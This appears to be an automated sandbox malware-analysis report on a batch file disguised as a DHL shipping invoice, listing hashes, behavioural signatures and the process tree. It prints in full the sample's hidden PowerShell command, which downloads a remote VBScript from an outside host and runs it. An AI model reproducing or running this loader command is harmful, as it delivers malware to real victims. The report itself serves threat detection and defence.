Analysis
-
max time kernel
16s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
16-10-2024 07:39
Static task
static1
Behavioral task
behavioral1
Sample
DHL_Shipping_Invoices_Awb_000000000101520242247820020031808174Global180030010152024.bat
Resource
win7-20240708-en
General
-
Target
DHL_Shipping_Invoices_Awb_000000000101520242247820020031808174Global180030010152024.bat
-
Size
542B
-
MD5
415f82e7ccaa07c5907805687a010209
-
SHA1
b9816a469c59fafb92b921a75bebecb9935277ad
-
SHA256
ef6cf434471b7ab9a035d09dcf5c5685e7c38afc6301b337c9531bfdae73bb83
-
SHA512
2f51a1a91dd6c86f00d7c3076ba8f1883ac714dc5d0f875f6ed38aa2ccc74511af6a6d848e01da56041c3e4cbad1bf8ac025a6b413369e1bd9e0446f7e144753
Malware Config
Extracted
https://in-houselegal.ro/YwDS3/calculators.vbs
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2352 powershell.exe 6 2352 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2352 powershell.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2412 cmd.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2352 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2352 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2412 wrote to memory of 2352 2412 cmd.exe 30 PID 2412 wrote to memory of 2352 2412 cmd.exe 30 PID 2412 wrote to memory of 2352 2412 cmd.exe 30 PID 2352 wrote to memory of 2384 2352 powershell.exe 31 PID 2352 wrote to memory of 2384 2352 powershell.exe 31 PID 2352 wrote to memory of 2384 2352 powershell.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\DHL_Shipping_Invoices_Awb_000000000101520242247820020031808174Global180030010152024.bat"1⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2412 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle hidden -command "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$OLUMG; $GLUFD = (New-Object Net.WebClient);$GLUFD.Encoding = [System.Text.Encoding]::UTF8;$OLUMG = $GLUFD.DownloadString( 'https://in-houselegal.ro/YwDS3/calculators.vbs' );$OLUMG = $GLUFD.DownloadString( $OLUMG ) ;$Hglgp = [System.IO.Path]::GetTempPath() + '\x.vbs';$OLUMG | Out-File -FilePath $Hglgp; wscript.exe //nologo $Hglgp"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" //nologo C:\Users\Admin\AppData\Local\Temp\\x.vbs3⤵PID:2384
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84